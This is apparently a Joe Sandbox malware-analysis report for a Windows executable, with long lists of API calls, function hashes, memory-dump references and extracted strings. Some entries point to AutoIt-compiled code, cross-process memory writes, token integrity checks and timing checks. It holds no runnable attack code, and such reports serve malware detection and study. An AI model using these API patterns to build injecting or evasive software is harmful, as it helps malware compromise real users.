                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                • Opcode ID: 2f43f50cc0a5f9dd9a828bb81ee2c633c4c68cfc9a7de64104994cf44fd15ba5
                                                • Instruction ID: 52becf843c30f96d9658868c0335182eecafa8f7d414679987230aef257065f3
                                                • Opcode Fuzzy Hash: 2f43f50cc0a5f9dd9a828bb81ee2c633c4c68cfc9a7de64104994cf44fd15ba5
                                                • Instruction Fuzzy Hash: 6D11E5B2905608ABCB109BA8DC08AAB7FBCEB55320F144266F814D3351D679C90087A1
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8546
                                                • GetLastError.KERNEL32(?,007C800A,?,?,?), ref: 007C8550
                                                • GetProcessHeap.KERNEL32(00000008,?,?,007C800A,?,?,?), ref: 007C855F
                                                • HeapAlloc.KERNEL32(00000000,?,007C800A,?,?,?), ref: 007C8566
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C857D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: cd7f32b4e21e020fe33c130085f370b1cdc7e2a80dd8a0bfe0dc92c1803ee1f6
                                                • Instruction ID: 04db12a3893825c0b88a59c7bd938513c821dd816408399de8ea349cf9447f32
                                                • Opcode Fuzzy Hash: cd7f32b4e21e020fe33c130085f370b1cdc7e2a80dd8a0bfe0dc92c1803ee1f6
                                                • Instruction Fuzzy Hash: 16014B75240208EFDB214FA6EC88D6B7BACEF8A355714453EF909C2220DE768D10CA61
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5307
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5315
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D531D
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5327
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5363
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: bf1e43ed4688ba0b7f90a0a2f9de962902ef1bc58952899c29b0d67b70bbafb6
                                                • Instruction ID: d0f057d067db0af5ac3176bc3909eb1378974114953d858a646468f4e1443b84
                                                • Opcode Fuzzy Hash: bf1e43ed4688ba0b7f90a0a2f9de962902ef1bc58952899c29b0d67b70bbafb6
                                                • Instruction Fuzzy Hash: 0B016932C01A1DDBCF00AFA4E8889EDBB78FF08351F06455AE941F2240CF789954C7A5
                                                APIs
                                                • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?,?,007C777D), ref: 007C744F
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C746A
                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C7478
                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?), ref: 007C7488
                                                • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007C736C,80070057,?,?), ref: 007C7494
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                • String ID:
                                                • API String ID: 3897988419-0
                                                • Opcode ID: abf92fa03b7af06dd5b1e38356d48f6dd42ad7a2ec325e7450b0e7b92e292bda
                                                • Instruction ID: 8181a4db73feddeb71f9552021f148f52f7db8a41dc0cffa7c228c750a2f1947
                                                • Opcode Fuzzy Hash: abf92fa03b7af06dd5b1e38356d48f6dd42ad7a2ec325e7450b0e7b92e292bda
                                                • Instruction Fuzzy Hash: 75015E72601204BBDB185F64DC44FAA7FADEF447A2F14802CF908D2220DB39DE40EBA0
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C83E8
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C83F2
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8401
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8408
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C841E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 21a337cf1c4f30ac37b788f1598c981dae17a366169b600bf23cd5637a72ef12
                                                • Instruction ID: 8696f08a039742beb4e3113d12f3dfb557e27108b9e9ce4063af4be70321e678
                                                • Opcode Fuzzy Hash: 21a337cf1c4f30ac37b788f1598c981dae17a366169b600bf23cd5637a72ef12
                                                • Instruction Fuzzy Hash: 8AF04931204206FFEB105FA5EC89F7B3BACEF89754B00842DF949C6250CE699D41DA65
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8449
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8453
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8462
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8469
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C847F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 7041cd43e6fc7bc4173e2813b46a5e125784a94a3bdb9d088378aca785c2d818
                                                • Instruction ID: 4ad5d94486361c0f4a5a13d96de48ac292e24bac643c19f420f068a8405ce314
                                                • Opcode Fuzzy Hash: 7041cd43e6fc7bc4173e2813b46a5e125784a94a3bdb9d088378aca785c2d818
                                                • Instruction Fuzzy Hash: A2F04931200209AFEB611FA5EC88F7B3BACEF89754B04412DF949C7250CE699E41DB65
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CC4B9
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 007CC4D0
                                                • MessageBeep.USER32(00000000), ref: 007CC4E8
                                                • KillTimer.USER32(?,0000040A), ref: 007CC504
                                                • EndDialog.USER32(?,00000001), ref: 007CC51E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 191622e83375f37eabfcee0b72e6bc5fea09df3cbd081b65c48524340af58f0c
                                                • Instruction ID: 428a1b2d03a68c975ab2ecc2d454234e4e04b24d658340b15b6c1f048f2146b7
                                                • Opcode Fuzzy Hash: 191622e83375f37eabfcee0b72e6bc5fea09df3cbd081b65c48524340af58f0c
                                                • Instruction Fuzzy Hash: F2016230500704ABEB255B20ED4EFA67BB8FF00B06F00866DE586E14E1DFE8A954CA94
                                                APIs
                                                • EndPath.GDI32(?), ref: 007713BF
                                                • StrokeAndFillPath.GDI32(?,?,007ABA08,00000000,?), ref: 007713DB
                                                • SelectObject.GDI32(?,00000000), ref: 007713EE
                                                • DeleteObject.GDI32 ref: 00771401
                                                • StrokePath.GDI32(?), ref: 0077141C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: 590cbb3c3399a125f2221899da746b31664a31878df0d322694450f2f0a342db
                                                • Instruction ID: 58fd07a1b62e7e252049d7bb85d5efc2226ff3a4a7fc54c61f96030b055bb91a
                                                • Opcode Fuzzy Hash: 590cbb3c3399a125f2221899da746b31664a31878df0d322694450f2f0a342db
                                                • Instruction Fuzzy Hash: D3F03730004B48EBDB115F2AEC4CB693FA5BB41366F58CA35E529880F1CB3C8995DF14
                                                APIs
                                                  • Part of subcall function 00790F36: std::exception::exception.LIBCMT ref: 00790F6C
                                                  • Part of subcall function 00790F36: __CxxThrowException@8.LIBCMT ref: 00790F81
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                  • Part of subcall function 00777BB1: _memmove.LIBCMT ref: 00777C0B
                                                • __swprintf.LIBCMT ref: 0078302D
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00782EC6
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                • Opcode ID: 9ec5225ef688d1bd0dbbc681f33b588e9d236f07af978d1d3796c382ca4a6f25
                                                • Instruction ID: 959991d25f98e1c8400d6279267555811fbdc6de33baf804ccda52df8213e168
                                                • Opcode Fuzzy Hash: 9ec5225ef688d1bd0dbbc681f33b588e9d236f07af978d1d3796c382ca4a6f25
                                                • Instruction Fuzzy Hash: 57918F71108201DFCB18FF28D899D6EB7A5EF85750F00891DF5859B2A1DB78EE04CB92
                                                APIs
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                • CoInitialize.OLE32(00000000), ref: 007DBA47
                                                • CoCreateInstance.OLE32(00802D6C,00000000,00000001,00802BDC,?), ref: 007DBA60
                                                • CoUninitialize.OLE32 ref: 007DBA7D
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                Similarity
                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                • String ID: .lnk
                                                • API String ID: 2126378814-24824748
                                                • Opcode ID: 3f9e1743d19f219ebe8bbb773b2e3475c68f6d6bd178e7a9f15c587bffc851d6
                                                • Instruction ID: 864fa7e3cda31a43267a42ebefa6382301afdd344d71c4dbcd917dfbed9c474d
                                                • Opcode Fuzzy Hash: 3f9e1743d19f219ebe8bbb773b2e3475c68f6d6bd178e7a9f15c587bffc851d6
                                                • Instruction Fuzzy Hash: 3DA14374604201DFCB00DF14C888D2ABBE5FF88324F158999F99A9B3A1CB39EC45CB91
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0079521D
                                                  • Part of subcall function 007A0270: __87except.LIBCMT ref: 007A02AB
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: defec58d29dcad42d8765d1a15bc13bcd6608a277363c5a1ad9248e7aa788700
                                                • Instruction ID: 994d62c3b3ab5b7996ba69abb83bd2f633c4d9bfe26617779a47cfdac24c4613
                                                • Opcode Fuzzy Hash: defec58d29dcad42d8765d1a15bc13bcd6608a277363c5a1ad9248e7aa788700
                                                • Instruction Fuzzy Hash: 57515861E0DA01D7DF12AB24E94537E2B94FB82710F248E58F495861E5EF3C8CC99B86
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: 0db7a3b5e823f0b700cd6ed84eec597b757db4a4f5c8dcb60041858e0b3d458d
                                                • Instruction ID: ed099044cce074885fadc805b197393b4653463ae29d2b37b7b2d16ef3946a22
                                                • Opcode Fuzzy Hash: 0db7a3b5e823f0b700cd6ed84eec597b757db4a4f5c8dcb60041858e0b3d458d
                                                • Instruction Fuzzy Hash: 3B5100B5504656DFCF299F28D488BFA7BA4FF15310F14805DEC919B2A0C739AC82CBA0
                                                Similarity
                                                • API ID: _memmove$_free
                                                • String ID: Oax
                                                • API String ID: 2620147621-2797580295
                                                • Opcode ID: ab1b2f70a645323fa154174f046001056899afbe4bb2863914687dfe75888b9a
                                                • Instruction ID: fa9f5f8193dfb27a6bc5155109457b0bd36ad4593992017f665b5c9cc43c5d49
                                                • Opcode Fuzzy Hash: ab1b2f70a645323fa154174f046001056899afbe4bb2863914687dfe75888b9a
                                                • Instruction Fuzzy Hash: 2E515C71A083419FDB28DF28C881B6FBBE5BF85714F04492DE98997351E739DA01CB92
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: 90fe1df5284464d2357abc0874a992af060512ef3c14c44d9abea898f5a9bf3b
                                                • Instruction ID: 8b806fc06372a51b7f8ca27a6ff9b1a47cd7649bc5c02255a8e6d8084ba2c321
                                                • Opcode Fuzzy Hash: 90fe1df5284464d2357abc0874a992af060512ef3c14c44d9abea898f5a9bf3b
                                                • Instruction Fuzzy Hash: F751B371900359EFDB24DF55C845BAAB7F4FF04314F20856EE94ACB241E778AA84CB80
                                                APIs
                                                  • Part of subcall function 007D17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9558,?,?,00000034,00000800,?,00000034), ref: 007D1817
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007C9B01
                                                  • Part of subcall function 007D17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9587,?,?,00000800,?,00001073,00000000,?,?), ref: 007D17E2
                                                  • Part of subcall function 007D170F: GetWindowThreadProcessId.USER32(?,?), ref: 007D173A
                                                  • Part of subcall function 007D170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C951C,00000034,?,?,00001004,00000000,00000000), ref: 007D174A
                                                  • Part of subcall function 007D170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C951C,00000034,?,?,00001004,00000000,00000000), ref: 007D1760
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C9B6E
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C9BBB
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: ad77094374dca727c20747a3864e6e1efcff2593c44dc2df54248afe958e0b09
                                                • Instruction ID: 9b472a310ce3e522691694df1fc54b58c3f5d78147c0dd7bf36086289c1b4f72
                                                • Opcode Fuzzy Hash: ad77094374dca727c20747a3864e6e1efcff2593c44dc2df54248afe958e0b09
                                                • Instruction Fuzzy Hash: B6413B76900218BFDB10EFA4CD85EEEBBB8AF09310F104099FA55B7291DA746E45CB60
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FF910,00000000,?,?,?,?), ref: 007F7A11
                                                • GetWindowLongW.USER32 ref: 007F7A2E
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F7A3E
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 89c8b77d5dcac8a5fe6c0e4310575d496bce911fd860cdd61aa0941d47401981
                                                • Instruction ID: 5f94aae5a7862cdb29fbe1e17398c1ad087dbaeb3697ab63a8793be7b6b8f69b
                                                • Opcode Fuzzy Hash: 89c8b77d5dcac8a5fe6c0e4310575d496bce911fd860cdd61aa0941d47401981
                                                • Instruction Fuzzy Hash: E9319D3120460AABDF158E38CC45BFA77A9EF45334F248725F975D22E0C778A951CB50
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7493
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F74A7
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F74CB
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: eb12b401e33414f919ab93546e239efc6cda38a697eb47de300e1faed48bbda1
                                                • Instruction ID: fcfed0303eba371118084b0233a26477ddbe64e13b2e413158700438b133f7b2
                                                • Opcode Fuzzy Hash: eb12b401e33414f919ab93546e239efc6cda38a697eb47de300e1faed48bbda1
                                                • Instruction Fuzzy Hash: 0C21A33250021DABDF258F94DC46FFA3B79FF48724F110114FE54AB290DA79A851DB90
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F7C7C
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F7C8A
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F7C91
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: dac3df10a4f8d515217892e473af339090e10fe959b79b209229971ad9c57c11
                                                • Instruction ID: 763f94e2e92112063bde5910f0aceea092d2cbedc489a3afc932a412d8087827
                                                • Opcode Fuzzy Hash: dac3df10a4f8d515217892e473af339090e10fe959b79b209229971ad9c57c11
                                                • Instruction Fuzzy Hash: 4F2148B5604209AFDB14DF14DC81CB73BEDEB4A3A4B050459FA009B361DA35EC51CAA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F6D6D
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F6D7D
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F6DA2
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: fe62b08e1b190b5509e9e57b987c34acf1b39d50ae8767791036dcd6ea73c706
                                                • Instruction ID: e7c403986e8e438a49e34fa2f17a16508f5f8f3c9660d10f02f921bb33bd9b5e
                                                • Opcode Fuzzy Hash: fe62b08e1b190b5509e9e57b987c34acf1b39d50ae8767791036dcd6ea73c706
                                                • Instruction Fuzzy Hash: BE21C232710118BFEF118F54DC85EBB3BAAEF89764F118124FA049B290CA75AC51C7A0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007F77A4
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007F77B9
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007F77C6
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00774C2E), ref: 00774CA3
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00774CB5
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00774D2E,?,00774F4F,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774D6F
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00774D81
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00774CE1,?), ref: 00774DA2
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00774DB4
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007F10C1), ref: 007F0E80
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F0E92
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E8E09,?,007FF910), ref: 007E9203
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E9215
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE1D2
                                                • CharLowerBuffW.USER32(?,?), ref: 007EE215
                                                  • Part of subcall function 007ED8B9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007ED8D9
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE415
                                                • _memmove.LIBCMT ref: 007EE428
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007E81D8
                                                • CoUninitialize.OLE32 ref: 007E81E3
                                                  • Part of subcall function 007CD87B: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007CD8E3
                                                • VariantInit.OLEAUT32(?), ref: 007E81EE
                                                • VariantClear.OLEAUT32(?), ref: 007E84BF
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7A12
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7A2A
                                                • CLSIDFromProgID.OLE32(?,?,00000000,007FFB80,000000FF,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7A4F
                                                • _memcmp.LIBCMT ref: 007C7A70
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007F9895
                                                • ScreenToClient.USER32(00000002,00000002), ref: 007F98C8
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007F9935
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 007E6AE7
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6AF7
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E6B5B
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6B67
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                • Opcode ID: 81b87be1914f76a7043c2d66bf6c5c09037e43c274bd6930bfcdb0f7bb938a23
                                                • Instruction ID: cba3e231d315d1205b935e5ef122d91b92e8821f3a092e100671a8508618dba3
                                                • Opcode Fuzzy Hash: 81b87be1914f76a7043c2d66bf6c5c09037e43c274bd6930bfcdb0f7bb938a23
